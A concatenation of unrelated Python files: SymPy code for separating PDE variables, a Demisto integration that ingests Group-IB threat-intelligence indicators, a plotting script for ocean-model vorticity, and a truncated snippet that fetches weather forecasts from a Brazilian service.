[Derivative(X(x), (x, 2))/X(x), Derivative(T(t), (t, 2))/T(t)]
See Also
========
pde_separate_add, pde_separate_mul
"""
do_add = False
if strategy == 'add':
do_add = True
elif strategy == 'mul':
do_add = False
else:
raise ValueError('Unknown strategy: %s' % strategy)
if isinstance(eq, Equality):
if eq.rhs != 0:
return pde_separate(Eq(eq.lhs - eq.rhs, 0), fun, sep, strategy)
else:
return pde_separate(Eq(eq, 0), fun, sep, strategy)
if eq.rhs != 0:
raise ValueError("Value should be 0")
# Handle arguments
orig_args = list(fun.args)
subs_args = []
for s in sep:
for j in range(0, len(s.args)):
subs_args.append(s.args[j])
if do_add:
functions = reduce(operator.add, sep)
else:
functions = reduce(operator.mul, sep)
# Check whether variables match
if len(subs_args) != len(orig_args):
raise ValueError("Variable counts do not match")
# Check for duplicate arguments like [X(x), u(x, y)]
if has_dups(subs_args):
raise ValueError("Duplicate substitution arguments detected")
# Check whether the variables match
if set(orig_args) != set(subs_args):
raise ValueError("Arguments do not match")
# Substitute original function with separated...
result = eq.lhs.subs(fun, functions).doit()
# Divide by terms when doing multiplicative separation
if not do_add:
eq = 0
for i in result.args:
eq += i/functions
result = eq
svar = subs_args[0]
dvar = subs_args[1:]
return _separate(result, svar, dvar)
def pde_separate_add(eq, fun, sep):
"""
Helper function for searching additive separable solutions.
Consider an equation of two independent variables x, y and a dependent
variable w, we look for the product of two functions depending on different
arguments:
`w(x, y, z) = X(x) + y(y, z)`
Examples
========
>>> from sympy import E, Eq, Function, pde_separate_add, Derivative as D
>>> from sympy.abc import x, t
>>> u, X, T = map(Function, 'uXT')
>>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
>>> pde_separate_add(eq, u(x, t), [X(x), T(t)])
[exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
"""
return pde_separate(eq, fun, sep, strategy='add')
def pde_separate_mul(eq, fun, sep):
"""
Helper function for searching multiplicative separable solutions.
Consider an equation of two independent variables x, y and a dependent
variable w, we look for the product of two functions depending on different
arguments:
`w(x, y, z) = X(x)*u(y, z)`
Examples
========
>>> from sympy import Function, Eq, pde_separate_mul, Derivative as D
>>> from sympy.abc import x, y
>>> u, X, Y = map(Function, 'uXY')
>>> eq = Eq(D(u(x, y), x, 2), D(u(x, y), y, 2))
>>> pde_separate_mul(eq, u(x, y), [X(x), Y(y)])
[Derivative(X(x), (x, 2))/X(x), Derivative(Y(y), (y, 2))/Y(y)]
"""
return pde_separate(eq, fun, sep, strategy='mul')
def _separate(eq, dep, others):
"""Separate expression into two parts based on dependencies of variables."""
# FIRST PASS
# Extract derivatives depending our separable variable...
terms = set()
for term in eq.args:
if term.is_Mul:
for i in term.args:
if i.is_Derivative and not i.has(*others):
terms.add(term)
continue
elif term.is_Derivative and not term.has(*others):
terms.add(term)
# Find the factor that we need to divide by
div = set()
for term in terms:
ext, sep = term.expand().as_independent(dep)
# Failed?
if sep.has(*others):
return None
div.add(ext)
# FIXME: Find lcm() of all the divisors and divide with it, instead of
# current hack :(
# https://github.com/sympy/sympy/issues/4597
if len(div) > 0:
final = 0
for term in eq.args:
eqn = 0
for i in div:
eqn += term / i
final += simplify(eqn)
eq = final
# SECOND PASS - separate the derivatives
div = set()
lhs = rhs = 0
for term in eq.args:
# Check, whether we have already term with independent variable...
if not term.has(*others):
lhs += term
continue
# ...otherwise, try to separate
temp, sep = term.expand().as_independent(dep)
# Failed?
if sep.has(*others):
return None
# Extract the divisors
div.add(sep)
rhs -= term.expand()
# Do the division
fulldiv = reduce(operator.add, div)
lhs = simplify(lhs/fulldiv).expand()
rhs = simplify(rhs/fulldiv).expand()
# ...and check whether we were successful :)
if lhs.has(*others) or rhs.has(dep):
return None
return [lhs, rhs]
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
""" IMPORTS """
from typing import Dict, Generator, List, Optional, Tuple, Union
import dateparser
import urllib3
# Disable insecure warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
# todo: add all necessary field types
COMMON_FIELD_TYPES = ['trafficlightprotocol']
DATE_FIELDS_LIST = ["creationdate", "firstseenbysource", "lastseenbysource", "gibdatecompromised"]
MAPPING: dict = {
"compromised/mule": {
"indicators":
[
{
"main_field": 'account', "main_field_type": 'GIB Compromised Mule',
"add_fields": [
'dateAdd', 'sourceType', 'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'creationdate', 'source', 'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.url', "main_field_type": 'URL',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.domain', "main_field_type": 'Domain',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', 'malware.name',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation', 'gibmalwarename',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid'
]
}
]
},
"compromised/imei": {
"indicators":
[
{
"main_field": 'cnc.url', "main_field_type": 'URL',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.domain', "main_field_type": 'Domain',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'device.imei', "main_field_type": 'GIB Compromised IMEI',
"add_fields": [
'dateDetected', 'dateCompromised', 'device.model',
'client.ipv4.asn', 'client.ipv4.countryName',
'client.ipv4.region', 'client.ipv4.ip',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types":[
'creationdate', 'gibdatecompromised', 'devicemodel',
'asn', 'geocountry', 'geolocation', 'ipaddress',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
}
]
},
"attacks/ddos": {
"indicators":
[
{
"main_field": 'cnc.url', "main_field_type": 'URL',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.domain', "main_field_type": 'Domain',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'target.ipv4.ip', "main_field_type": 'GIB Victim IP',
"add_fields": [
'target.ipv4.asn', 'target.ipv4.countryName', 'target.ipv4.region',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'dateBegin', 'dateEnd'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"attacks/deface": {
"indicators":
[
{
"main_field": 'url', "main_field_type": 'URL',
"add_fields": ['threatActor.name', 'threatActor.isAPT', 'threatActor.id'],
"add_fields_types": ['gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid']
},
{
"main_field": 'targetDomain', "main_field_type": 'Domain',
"add_fields": ['threatActor.name', 'threatActor.isAPT', 'threatActor.id'],
"add_fields_types": ['gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid']
},
{
"main_field": 'targetIp.ip', "main_field_type": 'IP',
"add_fields": [
'targetIp.asn', 'targetIp.countryName', 'targetIp.region',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid'
]
}
]
},
"attacks/phishing": {
"indicators":
[
{
"main_field": 'url', "main_field_type": 'URL',
},
{
"main_field": 'phishingDomain.domain', "main_field_type": 'Domain',
"add_fields":
[
'phishingDomain.dateRegistered', 'dateDetected',
'phishingDomain.registrar',
'phishingDomain.title', 'targetBrand',
'targetCategory', 'targetDomain'
],
"add_fields_types":
[
'creationdate', 'firstseenbysource',
'registrarname',
'gibphishingtitle', 'gibtargetbrand',
'gibtargetcategory', 'gibtargetdomain'
]
},
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": ['ipv4.asn', 'ipv4.countryName', 'ipv4.region'],
"add_fields_types": ['asn', 'geocountry', 'geolocation']
}
]
},
"attacks/phishing_kit": {
"indicators":
[
{
"main_field": 'emails', "main_field_type": 'Email',
"add_fields": ['dateFirstSeen', 'dateLastSeen'],
"add_fields_types": ['firstseenbysource', 'lastseenbysource']
}
]
},
"apt/threat": {
"indicators":
[
{
"main_field": 'indicators.params.ipv4', "main_field_type": 'IP',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.domain', "main_field_type": 'Domain',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.url', "main_field_type": 'URL',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.hashes.md5', "main_field_type": 'File',
"add_fields": [
'indicators.params.name', 'indicators.params.hashes.md5',
'indicators.params.hashes.sha1',
'indicators.params.hashes.sha256', 'indicators.params.size',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibfilename', 'md5', 'sha1', 'sha256', 'size',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"hi/threat": {
"indicators":
[
{
"main_field": 'indicators.params.ipv4', "main_field_type": 'IP',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.domain', "main_field_type": 'Domain',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.url', "main_field_type": 'URL',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.hashes.md5', "main_field_type": 'File',
"add_fields": [
'indicators.params.name', 'indicators.params.hashes.md5',
'indicators.params.hashes.sha1',
'indicators.params.hashes.sha256', 'indicators.params.size',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibfilename', 'md5', 'sha1', 'sha256', 'size',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"suspicious_ip/tor_node": {
'indicators':
[
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": ['ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'dateFirstSeen', 'dateLastSeen'],
"add_fields_types": ['asn', 'geocountry', 'geolocation', 'firstseenbysource', 'lastseenbysource']
}
]
},
"suspicious_ip/open_proxy": {
'indicators':
[
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields":
[
'ipv4.asn', 'ipv4.countryName', 'ipv4.region',
'port', 'anonymous', 'source',
'dateFirstSeen', 'dateDetected'
],
"add_fields_types":
[
'asn', 'geocountry', 'geolocation',
'gibproxyport', 'gibproxyanonymous', 'source',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"suspicious_ip/socks_proxy": {
'indicators':
[
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": ['ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'dateFirstSeen', 'dateLastSeen'],
"add_fields_types": ['asn', 'geocountry', 'geolocation', 'firstseenbysource', 'lastseenbysource']
}
]
},
"malware/cnc": {
'indicators':
[
{
'main_field': 'url', "main_field_type": 'URL',
"add_fields": [
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'dateDetected', 'dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
'main_field': 'domain', "main_field_type": 'Domain',
"add_fields": [
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'dateDetected', 'dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'ipv4.asn', 'ipv4.countryName', 'ipv4.region',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'dateDetected', 'dateLastSeen'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"osi/vulnerability": {
'indicators':
[
{
'main_field': 'id', "main_field_type": 'CVE',
"add_fields":
[
'cvss.score', 'cvss.vector', 'softwareMixed',
'description', 'dateModified', 'datePublished'
],
"add_fields_types":
[
'cvss', 'gibcvssvector', 'gibsoftwaremixed',
'cvedescription', 'cvemodified', 'published'
]
}
]
},
}
class Client(BaseClient):
"""
Client will implement the service API, and should not contain any Demisto logic.
Should only do requests and return data.
"""
def create_update_generator(self, collection_name: str, date_from: Optional[str] = None,
seq_update: Union[int, str] = None, limit: int = 200) -> Generator:
"""
Creates generator of lists with feeds class objects for an update session
(feeds are sorted in ascending order) `collection_name` with set parameters.
`seq_update` allows you to receive all relevant feeds. Such a request uses the seq_update parameter,
you will receive a portion of feeds that starts with the next `seq_update` parameter for the current collection.
For all feeds in the Group IB Intelligence continuous numbering is carried out.
For example, the `seq_update` equal to 1999998 can be in the `compromised/accounts` collection,
and a feed with seq_update equal to 1999999 can be in the `attacks/ddos` collection.
If item updates (for example, if new attacks were associated with existing APT by our specialists
or tor node has been detected as active again), the item gets a new parameter and it automatically rises
in the database and "becomes relevant" again.
:param collection_name: collection to update.
:param date_from: start date of update session.
:param seq_update: identification number from which to start the session.
:param limit: size of portion in iteration.
"""
while True:
params = {'df': date_from, 'limit': limit, 'seqUpdate': seq_update}
params = {key: value for key, value in params.items() if value}
portion = self._http_request(method="GET", url_suffix=collection_name + '/updated',
params=params, timeout=60.,
retries=4, status_list_to_retry=[429, 500])
if portion.get("count") == 0:
break
seq_update = portion.get("seqUpdate")
date_from = None
yield portion.get('items')
def create_search_generator(self, collection_name: str, date_from: str = None,
limit: int = 200) -> Generator:
"""
Creates generator of lists with feeds for the search session
(feeds are sorted in descending order) for `collection_name` with set parameters.
:param collection_name: collection to search.
:param date_from: start date of search session.
:param limit: size of portion in iteration.
"""
result_id = None
while True:
params = {'df': date_from, 'limit': limit, 'resultId': result_id}
params = {key: value for key, value in params.items() if value}
portion = self._http_request(method="GET", url_suffix=collection_name,
params=params, timeout=60.,
retries=4, status_list_to_retry=[429, 500])
if len(portion.get('items')) == 0:
break
result_id = portion.get("resultId")
date_from = None
yield portion.get('items')
def search_feed_by_id(self, collection_name: str, feed_id: str) -> Dict:
"""
Searches for feed with `feed_id` in collection with `collection_name`.
:param collection_name: in what collection to search.
:param feed_id: id of feed to search.
"""
portion = self._http_request(method="GET", url_suffix=collection_name + '/' + feed_id, timeout=60.,
retries=4, status_list_to_retry=[429, 500])
return portion
def test_module(client: Client) -> str:
"""
Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.
:param client: GIB_TI&A_Feed client
:return: 'ok' if test passed, anything else will fail the test.
"""
generator = client.create_update_generator(collection_name='compromised/mule', limit=10)
generator.__next__()
return 'ok'
""" Support functions """
def find_element_by_key(obj, key):
"""
Recursively finds element or elements in dict.
"""
path = key.split(".", 1)
if len(path) == 1:
if isinstance(obj, list):
return [i.get(path[0]) for i in obj]
elif isinstance(obj, dict):
return obj.get(path[0])
else:
return obj
else:
if isinstance(obj, list):
return [find_element_by_key(i.get(path[0]), path[1]) for i in obj]
elif isinstance(obj, dict):
return find_element_by_key(obj.get(path[0]), path[1])
else:
return obj
def unpack_iocs(iocs, ioc_type, fields, fields_names, collection_name):
"""
Recursively ties together and transforms indicator data.
"""
unpacked = []
if isinstance(iocs, list):
for i, ioc in enumerate(iocs):
buf_fields = []
for field in fields:
if isinstance(field, list):
buf_fields.append(field[i])
else:
buf_fields.append(field)
unpacked.extend(unpack_iocs(ioc, ioc_type, buf_fields, fields_names, collection_name))
else:
if iocs in ['255.255.255.255', '0.0.0.0', '', None]:
return unpacked
fields_dict = {fields_names[i]: fields[i] for i in range(len(fields_names)) if fields[i] is not None}
# Transforming one certain field into a markdown table
if ioc_type == "CVE" and len(fields_dict["gibsoftwaremixed"]) != 0:
soft_mixed = fields_dict.get("gibsoftwaremixed", {})
buffer = ''
for chunk in soft_mixed:
software_name = ', '.join(chunk.get('softwareName'))
software_type = ', '.join(chunk.get('softwareType'))
software_version = ', '.join(chunk.get('softwareVersion'))
if len(software_name) != 0 or len(software_type) != 0 or len(software_version) != 0:
buffer += '| {0} | {1} | {2} |\n'.format(software_name, software_type,
software_version.replace('||', ', '))
if len(buffer) != 0:
buffer = "| Software Name | Software Type | Software Version |\n" \
"| ------------- | ------------- | ---------------- |\n" + buffer
fields_dict["gibsoftwaremixed"] = buffer
else:
del fields_dict["gibsoftwaremixed"]
# Transforming into correct date format
for date_field in DATE_FIELDS_LIST:
if fields_dict.get(date_field):
fields_dict[date_field] = dateparser.parse(fields_dict.get(date_field)).strftime('%Y-%m-%dT%H:%M:%SZ')
fields_dict.update({'gibcollection': collection_name})
unpacked.append({'value': iocs, 'type': ioc_type,
'rawJSON': {'value': iocs, 'type': ioc_type, **fields_dict}, 'fields': fields_dict})
return unpacked
def find_iocs_in_feed(feed: Dict, collection_name: str, common_fields: Dict) -> List:
"""
Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto.
:param feed: feed from GIB TI&A.
:param collection_name: which collection this feed belongs to.
:param common_fields: fields defined by user.
"""
indicators = []
indicators_info = MAPPING.get(collection_name, {}).get('indicators', [])
for i in indicators_info:
main_field = find_element_by_key(feed, i['main_field'])
main_field_type = i['main_field_type']
add_fields = []
add_fields_list = i.get('add_fields', []) + ['id']
for j in add_fields_list:
add_fields.append(find_element_by_key(feed, j))
add_fields_types = i.get('add_fields_types', []) + ['gibid']
for field_type in COMMON_FIELD_TYPES:
if common_fields.get(field_type):
add_fields.append(common_fields.get(field_type))
add_fields_types.append(field_type)
if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']:
add_fields.append(', '.join(find_element_by_key(feed, "malwareList.name")))
add_fields_types = add_fields_types + ['gibmalwarename']
indicators.extend(unpack_iocs(main_field, main_field_type, add_fields,
add_fields_types, collection_name))
return indicators
def get_human_readable_feed(indicators: List, type_: str, collection_name: str) -> str:
headers = ['value', 'type']
for fields in MAPPING.get(collection_name, {}).get('indicators', {}):
if fields.get('main_field_type') == type_:
headers.extend(fields['add_fields_types'])
break
if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']:
headers.append('gibmalwarename')
return tableToMarkdown("{0} indicators".format(type_), indicators,
removeNull=True, headers=headers)
def format_result_for_manual(indicators: List) -> Dict:
formatted_indicators: Dict[str, Any] = {}
for indicator in indicators:
indicator = indicator.get('rawJSON')
type_ = indicator.get('type')
if type_ == 'CVE':
del indicator["gibsoftwaremixed"]
if formatted_indicators.get(type_) is None:
formatted_indicators[type_] = [indicator]
else:
formatted_indicators[type_].append(indicator)
return formatted_indicators
""" Commands """
def fetch_indicators_command(client: Client, last_run: Dict, first_fetch_time: str,
indicator_collections: List, requests_count: int,
common_fields: Dict) -> Tuple[Dict, List]:
"""
This function will execute each interval (default is 1 minute).
:param client: GIB_TI&A_Feed client.
:param last_run: the greatest sequpdate we fetched from last fetch.
:param first_fetch_time: if last_run is None then fetch all incidents since first_fetch_time.
:param indicator_collections: list of collections enabled by client.
:param requests_count: count of requests to API per collection.
:param common_fields: fields defined by user.
:return: next_run will be last_run in the next fetch-indicators; indicators will be created in Demisto.
"""
indicators = []
next_run: Dict[str, Dict[str, Union[int, Any]]] = {"last_fetch": {}}
tags = common_fields.pop("tags", [])
for collection_name in indicator_collections:
last_fetch = last_run.get('last_fetch', {}).get(collection_name)
# Handle first time fetch
date_from = None
seq_update = None
if not last_fetch:
date_from = dateparser.parse(first_fetch_time)
if date_from is None:
raise DemistoException('Inappropriate indicators_first_fetch format, '
'please use something like this: 2020-01-01 or January 1 2020 or 3 days')
date_from = date_from.strftime('%Y-%m-%d')
else:
seq_update = last_fetch
portions = client.create_update_generator(collection_name=collection_name,
date_from=date_from, seq_update=seq_update)
k = 0
for portion in portions:
for feed in portion:
seq_update = feed.get('seqUpdate')
indicators.extend(find_iocs_in_feed(feed, collection_name, common_fields))
k += 1
if k >= requests_count:
break
if tags:
for indicator in indicators:
indicator["fields"].update({"tags": tags})
indicator["rawJSON"].update({"tags": tags})
next_run['last_fetch'][collection_name] = seq_update
return next_run, indicators
def get_indicators_command(client: Client, args: Dict[str, str]):
"""
Returns limited portion of indicators to War Room.
:param client: GIB_TI&A_Feed client.
:param args: arguments, provided by client.
"""
id_, collection_name = args.get('id'), args.get('collection', '')
indicators = []
raw_json = None
try:
limit = int(args.get('limit', '50'))
if limit > 50:
raise Exception('A limit should be lower than 50.')
except ValueError:
raise Exception('A limit should be a number, not a string.')
if collection_name not in MAPPING.keys():
raise Exception('Incorrect collection name. Please, choose one of the displayed options.')
if not id_:
portions = client.create_search_generator(collection_name=collection_name, limit=limit)
for portion in portions:
for feed in portion:
indicators.extend(find_iocs_in_feed(feed, collection_name, {}))
if len(indicators) >= limit:
indicators = indicators[:limit]
break
if len(indicators) >= limit:
break
else:
raw_json = client.search_feed_by_id(collection_name=collection_name, feed_id=id_)
indicators.extend(find_iocs_in_feed(raw_json, collection_name, {}))
if len(indicators) >= limit:
indicators = indicators[:limit]
formatted_indicators = format_result_for_manual(indicators)
results = []
for type_, indicator in formatted_indicators.items():
results.append(CommandResults(
readable_output=get_human_readable_feed(indicator, type_, collection_name),
raw_response=raw_json,
ignore_auto_extract=True
))
return results
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
params = demisto.params()
username = params.get('credentials').get('identifier')
password = params.get('credentials').get('password')
proxy = params.get('proxy', False)
verify_certificate = not params.get('insecure', False)
base_url = str(params.get("url"))
indicator_collections = params.get('indicator_collections', [])
indicators_first_fetch = params.get('indicators_first_fetch', '3 days').strip()
requests_count = int(params.get('requests_count', 2))
args = demisto.args()
command = demisto.command()
LOG(f'Command being called is {command}')
try:
client = Client(
base_url=base_url,
verify=verify_certificate,
auth=(username, password),
proxy=proxy,
headers={"Accept": "*/*"})
commands = {'gibtia-get-indicators': get_indicators_command}
if command == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif command == 'fetch-indicators':
# Set and define the fetch incidents command to run after activated via integration settings.
common_fields = {
'trafficlightprotocol': params.get("tlp_color"),
'tags': argToList(params.get("feedTags")),
}
next_run, indicators = fetch_indicators_command(client=client, last_run=get_integration_context(),
first_fetch_time=indicators_first_fetch,
indicator_collections=indicator_collections,
requests_count=requests_count,
common_fields=common_fields)
set_integration_context(next_run)
for b in batch(indicators, batch_size=2000):
demisto.createIndicators(b)
else:
return_results(commands[command](client, args))
# Log exceptions
except Exception as e:
return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import scipy.io.netcdf as netcdf
plt.ion()
flag_mov = 0
flag_traj = 0
dir0 = '../run/'
file1 = 'diags.0000000000.t001.nc'
file2 = 'grid.t001.nc'
f1 = netcdf.netcdf_file(dir0 + file1)
f2 = netcdf.netcdf_file(dir0 + file2)
x = f2.variables['X'][:].copy()
y = f2.variables['Y'][:].copy()
xp1 = f2.variables['Xp1'][:].copy()
yp1 = f2.variables['Yp1'][:].copy()
T = f1.variables['T'][:].copy()
si_x = len(x)
si_y = len(y)
si_t = len(T)
h_mit = f2.variables['Depth'][:,:].copy()
vort = f1.variables['momVort3'][0,:,:].copy()
vmin = np.min(vort)
vmax = -vmin
vcont = np.linspace(vmin,vmax,20)
xunit = 1000.0 # 1:m -- 1000:km
posxy = np.zeros((2,si_t),dtype='int')
if flag_traj == 1:
for nt in range(0,si_t):
vort = f1.variables['momVort3'][nt,:,:].copy()
posxy[0,nt],posxy[1,nt] = np.unravel_index(np.argmin(vort),vort.shape)
plt.figure()
if flag_mov == -1:
nt = 0
mytime = [49]
vort = f1.variables['momVort3'][mytime[nt],:,:].copy()
plt.contour(xp1[:si_x/2]/xunit,yp1/xunit,vort[:,:si_x/2],vcont,colors='k')
plt.title('Day ' + str(mytime[nt]+1))
plt.xlabel('x (km)')
plt.ylabel('y (km)')
myci = "CI: {:.1e}".format(vcont[1]-vcont[0])
plt.text(x[120]/xunit,y[5]/xunit,myci)
if flag_traj:
plt.plot(xp1[posxy[1,:mytime[nt]]]/xunit,yp1[posxy[0,:mytime[nt]]]/xunit,'b')
plt.plot(xp1[posxy[1,mytime[nt]:]]/xunit,yp1[posxy[0,mytime[nt]:]]/xunit,'b--')
elif flag_mov == 0:
mytime = [0,9,19,29]
for nt in range(0,len(mytime)):
plt.subplot(2,2,nt+1, aspect='equal')
vort = f1.variables['momVort3'][mytime[nt],:,:].copy()
plt.contour(xp1/xunit,yp1/xunit,vort.squeeze(),vcont,colors='k')
plt.contourf(x/xunit,y/xunit,h_mit,[-10,0],colors='0.5')
plt.title('Day ' + str(mytime[nt]+1))
if nt == 2 or nt == 3:
plt.xlabel('x (km)')
if nt == 0 or nt == 2:
plt.ylabel('y (km)')
myci = "CI: {:.1e}".format(vcont[1]-vcont[0])
plt.text(x[-170]/xunit,y[5]/xunit,myci)
plt.savefig('corner_10mit.eps')
elif flag_mov == 1:
vort = f1.variables['momVort3'][:,:,:].copy()
vmin = np.min(vort)
vmax = -vmin
vcont = np.linspace(vmin,vmax,20)
for nt in range(0,si_t):
vort = f1.variables['momVort3'][nt,:,:].copy()
vort = vort.squeeze()
vort[0,0] = vmin
vort[0,1] = vmax
plt.contourf(xp1/xunit,yp1/xunit,vort,vcont,cmap = plt.cm.bwr)
plt.contourf(x/xunit,y/xunit,h_mit,[-10,0],colors='0.5')
ext = '0'
if nt > 9:
ext = ''
plt.savefig('movie/ewall_'+ ext + str(nt) + 'mit.png')
plt.clf()
f1.close()
f2.close()
|
from xml.dom import minidom
from urllib import request
import xmltodict, json
def get_informacoes_clima_7_dias(latitude, longitude):
endpoint_lat_lng = "http://servicos.cptec.inpe.br/XML/cidade/7dias/" + latitude + "/" + longitude + "/previsaoLatLon.xml"
response = request.urlopen(endpoint_lat_lng)
data = json.dumps(xmltodict.parse(response))
return json.loads(data)
def get_texto_previsao_tempo(latitude, longitude):
clima = get_informacoes_clima_7_dias(latitude, longitude)
previsao_hoje = clima['cidade']['previsao'][0]
